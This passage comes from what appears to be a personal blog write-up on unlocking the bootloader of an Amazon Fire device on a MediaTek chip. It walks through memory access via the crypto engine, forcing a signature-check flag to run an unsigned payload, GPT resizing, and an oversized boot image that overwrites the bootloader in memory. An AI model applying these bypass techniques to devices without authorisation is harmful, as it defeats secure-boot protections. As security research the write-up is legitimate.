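        plaintext += xor_bytes(block_decrypt(block), previous)
        previous = block
    return plaintext


c1 = bytes.fromhex("DEADBEEFCAFEBABE13371337DEADBEEF")
c2 = bytes.fromhex("CAFEBABE13371337DEADBEEFCAFEBABE")
plain = cbc_decrypt(c1 + c2, iv=bytes(BLOCK))
p1, p2 = plain[:BLOCK], plain[BLOCK:]

print("P1 == D1:", p1 == toy_block_decrypt(c1))
print("P2 == D2 ^ C1:", p2 == xor_bytes(toy_block_decrypt(c2), c1))
```

Swapping toy_block_decrypt for a real AES primitive would not change either relation, since they only depend on how CBC chains the blocks.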

Writing data

A similar process can be used to arbitrarily write data to memory in chunks of 16 bytes using AES-CBC mode. In order to achieve this, a fixed pattern is defined for XOR operations:

pattern = bytes.fromhex("4dd12bdf0ec7d26c482490b3482a1b1f")

This pattern is used to manipulate the data before it's actually processed by the AES decryption function. Following that, the 16 bytes of data are split into four 4-byte (32-bit) words.

Each word is XORed with the corresponding word from the pattern. This XOR operation prepares the data in such a way that, when decrypted, it will result in the desired plaintext.

In addition to that, the source address for the operation is set to 0, which has to be a valid address containing all zeroes. The destination address is set to the target address addr, where the data should be written to. Lastly, another AES decryption gets triggered, which writes the manipulated data to the target address.

For example, let's assume the attacker wants to write the following 16 bytes of data to the target address 0x1000:

0xCAFEBABE13371337DEADBEEFCAFEBABE

This data represents 16 bytes of information. If we follow the process outlined above, the data is manipulated as follows:

Split the data into four 4-byte words:
- 0xCAFEBABE
- 0x13371337
- 0xDEADBEEF
- 0xCAFEBABE
Each word is XORed with the corresponding word from the pattern:
- 0xCAFEBABE ^ 0x4dd12bdf = 0x872f9161
- 0x13371337 ^ 0x0ec7d26c = 0x1df0c15b
- 0xDEADBEEF ^ 0x482490b3 = 0x96892e5c
- 0xCAFEBABE ^ 0x482a1b1f = 0x82d4a1a1
The source address for the AES operation is set to 0, and the destination address is set to 0x1000.
By triggering the AES decryption, the XORed data gets transformed back to the original plaintext and written to the target address.
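
The word-by-word XOR from the steps above can be sketched as follows. I'm reading the words as big-endian so the numbers line up with the worked example; the actual script may use a different byte order, and xor_with_pattern is just a name I picked for the illustration:

```python
import struct

PATTERN = bytes.fromhex("4dd12bdf0ec7d26c482490b3482a1b1f")


def xor_with_pattern(data):
    """XOR a 16-byte block with PATTERN, one 32-bit word at a time."""
    if len(data) != 16:
        raise ValueError("expected exactly 16 bytes")
    data_words = struct.unpack(">4I", data)
    pattern_words = struct.unpack(">4I", PATTERN)
    return [d ^ p for d, p in zip(data_words, pattern_words)]


words = xor_with_pattern(bytes.fromhex("CAFEBABE13371337DEADBEEFCAFEBABE"))
print([f"0x{w:08x}" for w in words])
```

Because XOR works byte by byte, the byte order only affects how the words are printed, not the bytes that end up being written.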

My failed attempt to dump bootROM

I tried to replicate the same method on my device, but by using the Preloader's CMD_READ32 command to read the GCPU's registers. While I was able to read and write GCPU registers, and I could even execute cryptographic operations, every time I tried to read 0x0, the IV came out as zero :(

After realizing I couldn't read anything from 0x0, I started to think that the second stage of the Preloader, which I'm targeting, might be running under an insufficiently privileged context and the GCPU somehow knew that.

In any case, I created a simple script to loop over the memory in chunks, try a read operation at each address, and log every result that isn't all zeros:

with open("test.txt", 'w') as f:
    address = 0x0
    step_size = 0x1000
    try:
        while True:
            data = dev.aes_read16(address)
            if data.hex() != '00000000000000000000000000000000':
                output = f'aes16_read @ 0x{address:08x} = {data.hex()}'
                print(output)
                f.write(output + '\n')
            address += step_size
    except KeyboardInterrupt:
        print(f'Last address: 0x{address:08x} (data: {data.hex()})')

I left the script dumping memory overnight and when I woke up, I found out that it had crashed at 0xffff0000:

Current address: 0xffff0000, Block data: 00000000000000000000000000000000
Traceback (most recent call last):
  File "/home/r0rt1z2/amonet/modules/main.py", line 204, in <module>
    main(dev, args)
  File "/home/r0rt1z2/amonet/modules/main.py", line 39, in main
    data = dev.aes_read16(address)
           ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/r0rt1z2/amonet/modules/common.py", line 222, in aes_read16
    self.write32(CRYPTO_BASE + 0xC04, addr)
  File "/home/r0rt1z2/amonet/modules/common.py", line 171, in write32
    self.dev.write(struct.pack(">I", word))
                   ^^^^^^^^^^^^^^^^^^^^^^^
struct.error: 'I' format requires 0 <= number <= 4294967295

However, I opened the file and found out it had actually dumped a lot of memory! Apparently, it started dumping from 0x80000000 and stopped when it reached 0xffff0000.
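
The struct.error in the traceback is simply the address counter running past the end of the 32-bit address space. A minimal sketch of a bounded loop, assuming the same ">I" packing that write32 uses in the traceback (scan_addresses is a hypothetical helper, not part of amonet):

```python
import struct

STEP = 0x1000
LIMIT = 1 << 32  # first value that no longer fits in an unsigned 32-bit word


def scan_addresses(start=0, step=STEP):
    """Yield every address in the 32-bit space, stopping before the counter overflows."""
    yield from range(start, LIMIT, step)


# The last address produced still packs cleanly...
last = max(scan_addresses(start=0xFFFF0000))
packed = struct.pack(">I", last)

# ...whereas one more step reproduces the error from the traceback.
try:
    struct.pack(">I", last + STEP)
    overflowed = False
except struct.error:
    overflowed = True

print(hex(last), overflowed)
```

Iterating over scan_addresses() in place of the bare while True would have let the script finish on its own.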

Uploading my own payload

After failing to dump bootROM, I decided to try to upload my own payload to the device. The first thing I did was to reverse engineer the Preloader to see how it handled Download Agents, since that was the only way to jump to something from the Preloader.

To understand how it works, let's take a look at the usbdl_handler function, which manages USB communication.

The device waits for a specific magic sequence from the host to stay in Preloader mode and accept instructions. If the magic sequence isn't received within a set timeout, the device continues with the normal boot process.

int usbdl_handler(bldr_comport *comport, uint32_t hshk_tmo_ms) {
    memcpy(startcmd_, startcmd, 4);
    start = get_timer(0);
    comm = comport->ops;
    uVar6 = 0;
    len32 = len32 & 0xffffff00;

    /*
     * handshake process begins here, the host has a few
     * seconds to send the magic sequence so the device
     * stays in Preloader mode and listens for commands.
     */
    while (true) {
        platform_wdt_kick();
        usbdl_get_byte(&cmd);

        if (cmd != 0xfe) {
            usbdl_put_byte(cmd); // echo back
        }
        // ...

If the magic sequence is received, the device enters a loop, continuously listening for instructions from the host. If we take a look at some of the leaked BSPs, we'll find a list of commands that the Preloader supports.

#define CMD_GET_HW_SW_VER          0xfc  // Get hardware and software version information from the device
#define CMD_GET_HW_CODE            0xfd  // Retrieve the hardware code that identifies the SoC model
#define CMD_GET_BL_VER             0xfe  // Get bootloader version currently running on the device
#define CMD_LEGACY_WRITE           0xa1  // Legacy write command for backward compatibility with older SoCs
#define CMD_LEGACY_READ            0xa2  // Legacy read command for backward compatibility with older SoCs
#define CMD_READ32                 0xD1  // Read 32-bit value from specified memory address within allowed range
#define CMD_WRITE32                0xD4  // Write 32-bit value to specified memory address within allowed range
#define CMD_JUMP_DA                0xD5  // Jump to Download Agent at fixed address after verification
#define CMD_SEND_DA                0xD7  // Send Download Agent binary to device memory for execution

Since I used CMD_WRITE32 in a lot of places, it's worth explaining how it works. This command is used to write a 32-bit value to a specific memory address. The host sends the command, the address, and the data to be written, and the device echoes back the address and data to confirm the operation.

It's worth noting that there's a range check to ensure the address is within a valid range; otherwise, we wouldn't have to abuse the crypto engine at all.

        /*
         * there are quite a few cmds, but I skipped
         * their handlers to focus on CMD_WRITE32 which
         * is what we'll use.
         */
        uint32_t base_addr = 0;
        uint32_t data = 0;
        uint32_t len32 = 0;

        // receive the parameters from the host (each one is echoed back).
        usbdl_get_dword(&base_addr);
        usbdl_put_dword(base_addr);
        usbdl_get_dword(&len32);
        usbdl_put_dword(len32);

        // check the alignment of the address.
        if ((base_addr & 3) != 0) goto err_and_ret;

        // make sure the size is actually valid.
        if (len32 == 0) goto err_and_ret;

        // prevent overflow attacks (len32 is a count of 32-bit words).
        if ((len32 << 2) <= len32) goto err_and_ret;

        // check if the address range is valid.
        sec_region_check(base_addr, len32 << 2);
        // ...

Next, the device enters a loop to receive data from the host, writing each data packet to the specified memory address. This process continues until all data is written. Once complete, the function handles any additional instructions or finalizes the Preloader operations.

        /*
         * if we reach this point, all the checks have passed
         * and we can notify the host about it so it can start
         * sending us the data we need to write.
         */
        usbdl_put_word(0);

        for (index = 0; index < len32; index = index + 1) {
            usbdl_get_dword(&data);
            usbdl_put_dword(data);
            *(uint32_t *)(base_addr + index * 4) = data;
        }
    }
    /*
     * the rest of the command handler would follow here, I
     * decided to omit it to keep this portion more simple.
     */
    return 0; 
}
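
Seen from the host, the exchange handled by the code above could look roughly like this. It's a sketch under a few assumptions: the command byte is echoed like the other fields, values are big-endian (as in the struct.pack(">I", ...) call from the earlier traceback), and only the steps visible in the handler are modelled. EchoPort is a made-up in-memory stand-in for the serial port so the snippet can run without a device, and the target address is arbitrary:

```python
import struct

CMD_WRITE32 = 0xD4


def write32(port, addr, words):
    """Send CMD_WRITE32 and verify every echo coming back from the device."""
    def send_checked(fmt, value):
        raw = struct.pack(fmt, value)
        port.write(raw)
        if port.read(len(raw)) != raw:
            raise RuntimeError("device echo mismatch")

    send_checked(">B", CMD_WRITE32)  # command byte (echo assumed)
    send_checked(">I", addr)         # base address
    send_checked(">I", len(words))   # length, counted in 32-bit words
    (status,) = struct.unpack(">H", port.read(2))
    if status != 0:
        raise RuntimeError(f"device rejected the request: 0x{status:04x}")
    for word in words:
        send_checked(">I", word)     # each data word is echoed too


class EchoPort:
    """Hypothetical fake port: echoes everything and reports status 0 after the header."""

    def __init__(self):
        self.sent = b""
        self.pending = b""
        self.writes = 0

    def write(self, raw):
        self.sent += raw
        self.pending += raw
        self.writes += 1
        if self.writes == 3:  # cmd, addr and len received: queue the status word
            self.pending += struct.pack(">H", 0)

    def read(self, n):
        out, self.pending = self.pending[:n], self.pending[n:]
        return out


port = EchoPort()
write32(port, 0x10000000, [0x1, 0x2])
print(port.sent.hex())
```

Checking every echo is what lets the host notice early if it has lost sync with the device.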

The next interesting command is CMD_JUMP_DA, which is used to jump to a Download Agent (DA) located at a (fixed) memory address. Naturally, the DA sent by the host has to be signed for this command to actually work and not crash.

if (local_41 == 0xd5) {
  usbdl_get_dword(&da_addr);
  usbdl_put_dword((uint32_t)da_addr);
  if (g_da_verified == 1) {
    status = 0;
  }
  else {
    status = 0x2001; // DA_IMAGE_SIG_VERIFY_FAIL
  }
  usbdl_put_word((uint16_t)status);
  if (status != 0) {
    dprintf("%s usbdl_jump_da: %x\n","[USBDL]",status);
    ASSERT("download.c",0x282,"0"); // crash and reboot
  }
  da_addr = &DAT_80001000;
  _da_arg->magic = 0x58885168;
  _da_arg->ver = 1;
  _da_arg->flags = 3;
  // ...
  g_boot_mode = 100;
  bldr_jump((uint32_t)da_addr,0x80000ff4,0xc);
  // ...
}

So, as we can see, if g_da_verified is set to 1, the device will jump to the fixed address 0x80001000 and execute the DA. If the DA is not verified, the device will crash and reboot.

We know that aes_write16 and aes_read16 can be used starting from address 0x80000000, so we can technically upload the payload in chunks of 16 bytes and then call it a day!
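
Splitting a payload into 16-byte writes is straightforward. In this sketch payload_chunks is a hypothetical helper, the zero padding of the last block is my own choice, and the placeholder payload only borrows its size (0x3BB2 bytes) from the log further down:

```python
DA_ADDR = 0x80001000  # fixed jump target seen in the CMD_JUMP_DA handler
CHUNK = 16            # one AES block per write


def payload_chunks(payload, base=DA_ADDR):
    """Yield (address, 16-byte block) pairs, zero-padding the final block."""
    padded = payload + bytes(-len(payload) % CHUNK)
    for off in range(0, len(padded), CHUNK):
        yield base + off, padded[off:off + CHUNK]


payload = bytes(0x3BB2)  # placeholder with the same size as pl.bin
chunks = list(payload_chunks(payload))
print(len(chunks), hex(chunks[-1][0]))
```

Each pair would then be handed to something like aes_write16(addr, block); the exact signature of that method is an assumption on my side.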

Oh, but there's a catch. As we've seen, g_da_verified is only set to 1 if the DA is signed. After countless hours of trying to bypass this restriction, out of mere desperation, I tried to write to that global variable with CMD_WRITE32 and... it worked! I was able to set it to 1 and jump to my own payload.

[2024-07-21 02:02:21.020854] Waiting for Preloader
[2024-07-21 02:02:40.487613] Found port = /dev/ttyACM0
[2024-07-21 02:02:40.527277] Handshake
[2024-07-21 02:02:40.549432] Disable watchdog
[2024-07-21 02:02:40.549937] Init crypto engine
[2024-07-21 02:02:40.565977] Disable DA verification check
[2024-07-21 02:02:40.566455] Load payload from ../brom-payload/pl/pl.bin = 0x3BB2 bytes
[2024-07-21 02:02:48.838860] Let's rock
[2024-07-21 02:02:48.839156] Wait for the payload to come online...
[2024-07-21 02:02:50.813918] all good

[PLFM] USB cable in
[TOOL] USB enum timeout (Yes), handshake timeout(Yes)
[USBD] USB Full Speed
[TOOL] Enumeration(Start)
[USBD] USB High Speed
[USBD] USB High Speed
[TOOL] Enumeration(End): OK 537ms 
[TOOL] sync time 277ms
[BLDR] jump to 0x80001000
[BLDR] <0x80001000>=0xFA000025
[BLDR] <0x80001004>=0xB5072300
[R0rt1z2] Hello from the other side!

At this point, I was able to upload my own payload to the device and execute it. I simply based it on k4y0z's Preloader-based payload for mantis and called it a day.

As for bootROM, when I tried to dump 0x0 (with the payload, that is), I got the following output:

00000000  04 f0 1f e5 00 10 00 12  04 f0 1f e5 00 10 00 12  |................|

As we've seen before, this is a jump instruction, which in this case redirects execution to 0x12001000. Doesn't this sound familiar? Yes, it's where PL1 gets loaded as well. So when I tried to dump that address, I was greeted by PL1 instead of bootROM.

I haven't bothered further with this, as it seemed like I hit a dead end. The only way to dump bootROM at this point was to gain arbitrary code execution before PL1 gets loaded, which is fairly complicated.

Unlocking the bootloader

After successfully gaining direct read/write access to the eMMC, the next step was to find a way to exploit the LK to permanently unlock the bootloader.

The first idea that came to mind was to use amonet's microloader, porting it from ford to ariel (considering they're very similar). However, I wondered, is it going to be that easy? That's what I was about to find out...

As explained in my previous article, microloader works by crafting a malicious boot image with a user-controlled kernel load address. This allows it to overwrite a portion of the LK (the one loaded into RAM and running at runtime) with a ROP chain, which is then executed by pivoting the stack.

This would be perfect... if only it had worked. I did a quick test on my device and was greeted with an image verification failure.

[1250]  > page count of kernel image = 2
[1260] Verifying kernel...
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1270] Error: fail to check 0xBC for pkcs_1_pss_decode_sha256 operation
[1270] [VERIFY_BOOTIMG] Error: fail to do pss decode for boot data.
[1280] [MBOOT] Load 'Android Boot Image' partition Error
[1290] 
[1290] *******************************************************
[1290] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1300] *******************************************************
[1300] > Please check kernel and rootfs in Android Boot Image are both correct.
[1310] *******************************************************
[1310] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1320] *******************************************************

So, what's going on? Why doesn't it crash LK instead, considering we're technically overwriting it? To get to the bottom of this, I decided to reverse engineer my LK image.

While doing so, I discovered that the load address specified in the header of the boot image is actually ignored. Regardless of what address you choose, the bootloader will always use 0x80208000 as the kernel load address.

// ... this is app(). After performing some initializations, 
// LK proceeds to load either a boot image, a recovery image, 
// or a factory image. Under all circumstances, it hardcodes 
// the load address.
ret = mboot_android_load_bootimg_hdr("boot", 0x80208000); // header
if (ret < 0) {
  msg_header_error("Android Boot Image"); // error and trigger assert()
}
ret = mboot_android_load_bootimg("boot", 0x80208000); // image
if (ret < 0) {
  msg_img_error("Android Boot Image"); // error and trigger assert()
}
// ...

As you can see, the second parameter of mboot_android_load_bootimg (which is the function amonet exploits) is a hardcoded load address. This address is then used to load the kernel into memory:

int mboot_android_load_bootimg(char *part_name, ulong addr) {
    part_dev_t *dev;
    part_t *part;
    int ret;
    uint64_t offset;

    dev = mt_part_get_device();
    if (dev == NULL) {
        dprintf("mboot_android_load_bootimg , dev = NULL\n");
        return -0x13;
    }

    part = mt_part_get_partition(part_name);
    if (part == (part_t *)0xffffffff) {
        dprintf("mboot_android_load_bootimg , part = NULL\n");
        return -2;
    }

    offset = partition_get_offset((int)part);
    // load whatever the data is to 0x80208000
    ret = dev->read(dev, addr, (uchar *)addr, (int)offset);

    if (verify_img(1, addr, _DAT_81e6c420, 0) == 0) {
        if (is_prod_device()) {
            FUN_81e3f6a0("console=tty0 console=ttyMT3,115200n1 root=/dev/ram", "%s androidboot.prod=1", "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
        } else {
            FUN_81e3f6a0("console=tty0 console=ttyMT3,115200n1 root=/dev/ram", "%s androidboot.prod=0", "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
        }
    } else {
        dprintf("failed to verify boot image. size :0x%x", _DAT_81e6c420);
        return -5;
    }

    return ret;
}

If you're quick enough (unlike me :P), you might have noticed that although the address is hardcoded, the verification of the data is carried out AFTER the image is loaded into memory.

Great, so how is this helpful to us? Well, this is where math comes in handy. We know that:

LK's load address in memory is 0x81E00000.
The kernel load address in memory is 0x80208000.

Notice that LK is placed AFTER (sometimes I wonder if MediaTek engineers are just plain stupid) the kernel in the memory map. Since the image is copied to memory before it gets verified, flashing a huge boot image could overwrite the loaded LK data, giving us the ability to execute arbitrary code.

The difference between the two addresses is 0x81E00000 - 0x80208000 = 0x1BF8000, which is 29,327,360 bytes (roughly 28 MiB, a bit under 30 MB). Do you see where I'm going with this?
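
The arithmetic is easy to double-check. The two addresses come straight from the text; overlaps_lk is a helper I added just to show when an image becomes big enough:

```python
LK_LOAD_ADDR = 0x81E00000
KERNEL_LOAD_ADDR = 0x80208000

gap = LK_LOAD_ADDR - KERNEL_LOAD_ADDR
print(f"gap = 0x{gap:X} bytes = {gap / (1024 * 1024):.2f} MiB")


def overlaps_lk(image_size):
    """True if an image loaded at KERNEL_LOAD_ADDR would reach LK's first byte."""
    return KERNEL_LOAD_ADDR + image_size > LK_LOAD_ADDR


for size_mib in (8, 30):
    size = size_mib * 1024 * 1024
    print(f"{size_mib} MiB image reaches LK: {overlaps_lk(size)}")
```

An image that fills the stock 8 MiB boot partition never gets close to LK, which is why a bigger partition is needed.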

Modifying the GPT

This step was quite easy, considering that we did it before in sloane to exploit LK in the same way. In this case, we just had to rename the original recovery and boot partitions to recovery_x and boot_x, then shrink userdata and create two 30 MB partitions called boot and recovery (which are what LK will pick up).

Since we don't have much internal storage on ariel (it's either 8 GB or 16 GB, depending on the model), I decided to shrink the cache partition instead, which has a total size of roughly 1 GB. In any case, the resulting GPT looked like this:

  Number   Start (sector)     End (sector)  Size          Name
      1               64              319  128.00 KiB    PRO_INFO
      2             2048            10239  4.00 MiB      PMT
      3            10240            20479  5.00 MiB      TEE1
      4            20480            30719  5.00 MiB      TEE2
      5            30720            31743  512.00 KiB    UBOOT
-     6            31744            48127  8.00 MiB      boot
-     7            48128            64511  8.00 MiB      recovery
+     6            31744            48127  8.00 MiB      boot_x
+     7            48128            64511  8.00 MiB      recovery_x
      8            64512            66559  1024.00 KiB   KB
      9            66560            68607  1024.00 KiB   DKB
     10            68608            69631  512.00 KiB    MISC
     11            69632           102399  16.00 MiB     persisbackup
     12           102400          2559999  1.17 GiB      system
-    13          2560000          4362239  880.00 MiB    cache
+    13          2560000          4239359  820.00 MiB    cache
+    14          4239360          4300799  30.00 MiB     boot
+    15          4300800          4362239  30.00 MiB     recovery
     16          4362240         30527454  12.48 GiB     userdata
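
A quick sanity check of the new entries, assuming 512-byte sectors. The sector numbers are copied from the table above; size_mib is just a small helper for the illustration:

```python
SECTOR_SIZE = 512  # assumed logical sector size

# (name, first sector, last sector) for the entries touched by the change
ENTRIES = [
    ("cache", 2560000, 4239359),
    ("boot", 4239360, 4300799),
    ("recovery", 4300800, 4362239),
]


def size_mib(first, last):
    """Size of an inclusive sector range in MiB."""
    return (last - first + 1) * SECTOR_SIZE / (1024 * 1024)


for name, first, last in ENTRIES:
    print(f"{name:<10}{size_mib(first, last):8.2f} MiB")

# Each partition must start right after the previous one ends.
contiguous = all(a[2] + 1 == b[1] for a, b in zip(ENTRIES, ENTRIES[1:]))
print("contiguous:", contiguous)
```

Both new partitions come out at 30 MiB, which is enough to cover the distance between the kernel load address and LK.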

Crafting the malicious boot image

Once we had the GPT ready, the next step was to craft a (big enough) boot image that would overwrite LK in memory. On older devices, a ROP chain was used to redirect execution to the payload, but with time we (k4y0z, t0x1cSH and I) realized it wasn't necessary.

One could just overwrite a function that gets called before the verification process with a direct jump to the payload. In the case of ariel, I decided to overwrite 0x81e099e8, which is the function used to verify the boot image:

int verify_img(int flag, void *img, uint p3, uint p4) {
    char status = *(char *)(_DAT_81e81258 + 0x16);
    int ret;

    if (status == '\x01') {
        dprintf("Device or user build unlocked, or non-user build on engineering device! Skip kernel verification.\n");
        if (flag != 0) {
            flag = 0;
            sprintf("console=tty0 console=ttyMT3,115200n1 root=/dev/ram",
                    "%s androidboot.unlocked_kernel=true",
                    "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
        }
    } else if (status == '\x02') {
        dprintf("Verifying kernel with engineering key...\n");
        ret = verify_img_type(img, p3, 1);
        if (ret != 0) {
            ret = -5;
        }
        return ret;
    } else {
        if (!is_prod_dev()) {
            dprintf("User build on engineering device. Skip verification.\n");
            return 0;
        }
        dprintf("Verifying kernel...\n");
        ret = verify_img_type(img, p3, 0);
        if (ret == 0) {
            if (flag != 0) {
                flag = 0;
                sprintf("console=tty0 console=ttyMT3,115200n1 root=/dev/ram",
                        "%s androidboot.unlocked_kernel=false",
                        "console=tty0 console=ttyMT3,115200n1 root=/dev/ram");
            }
            return 0;
        } else {
            flag = -5;
        }
    }
    return flag;
}

I simply forked sloane's amonet repository and modified the create_boot_img.py script to suit my needs. The result can be found here, and it generated the following image:

Payload Address: 0x81dff000
Payload Block:   57271
Part Size:       29763948 (28.39 MiB / 58133 Blocks)
Writing ../bin/boot.hdr...
Writing ../bin/boot.payload...

Lastly, I modified the bootROM-based Python scripts to automatically patch the GPT, downgrade bootloader images, and flash the payload to the corresponding block.

It took me a few attempts, but after adjusting some minor details, like using BL instead of BLX (unlike the original sloane exploit), I managed to jump to the payload and unlock the bootloader!
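
To give an idea of what such a direct jump looks like at the byte level, here is a sketch that encodes an ARM-state BL from the overwritten function to the payload address printed by the script. Whether that code actually runs in ARM or Thumb state is an assumption on my part (the sketch assumes ARM), and both helpers are hypothetical, not taken from the exploit:

```python
def encode_arm_bl(src, target):
    """Encode an ARM-state `BL target` placed at address src."""
    offset = target - (src + 8)  # pc reads as the instruction address + 8
    if offset % 4:
        raise ValueError("target must be word-aligned relative to src")
    if not -(1 << 25) <= offset < (1 << 25):
        raise ValueError("target out of range for BL")
    imm24 = (offset >> 2) & 0xFFFFFF  # signed 24-bit word offset
    return 0xEB000000 | imm24


def decode_arm_bl(src, insn):
    """Recover the branch target from an ARM-state BL located at src."""
    imm24 = insn & 0xFFFFFF
    if imm24 & 0x800000:  # sign-extend the 24-bit field
        imm24 -= 1 << 24
    return src + 8 + (imm24 << 2)


insn = encode_arm_bl(0x81E099E8, 0x81DFF000)
print(f"BL encoding: 0x{insn:08x}")
print(f"decoded target: 0x{decode_arm_bl(0x81E099E8, insn):08x}")
```

Unlike BLX with an immediate, BL keeps the current instruction set, so the payload entry point has to match the state of the code being overwritten.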

The functionality of the payload itself is the same as the one explained in my previous article. I just had to modify some parts to make it compatible with such an old device, such as the dev-read/write operations. You can check the full code here.

Demo of the PoC in action

Bonus: LineageOS 12.1

Considering how slow FireOS is, I decided it would be a great idea to have a smooth AOSP-based ROM. Since my motivation to build ROMs has been waning over the past few years, I didn't feel like bringing something newer than the latest stock version. Instead, I decided to build LineageOS 12.1 (formerly known as CyanogenMod 12.1) and make it as stable as possible.

After a few weeks of work, I managed to build a pretty solid ROM that runs 200 times faster than FireOS and is much more customizable. As of the time of writing, the only known bug in the ROM is video recording, which crashes the Camera application. All the sources used to build both TWRP and LineageOS 12.1 can be found in this GitHub organization.

Screenshot 1	Screenshot 2

Conclusions

This was a fun journey, and I'm glad I managed to unlock the bootloader and build a custom ROM for the device. This process has taught me a lot about MediaTek devices and how they work at a low level.

I'd like to thank k4y0z, t0x1cSH, and AntiEngineer for helping me with this project, both software and hardware-wise. I'd also like to thank zeroepoch and xyz for their amazing work on MediaTek devices. Nothing would have been possible without their contributions.

With this, I'm finishing this article. I hope you enjoyed reading it as much as I enjoyed writing it :)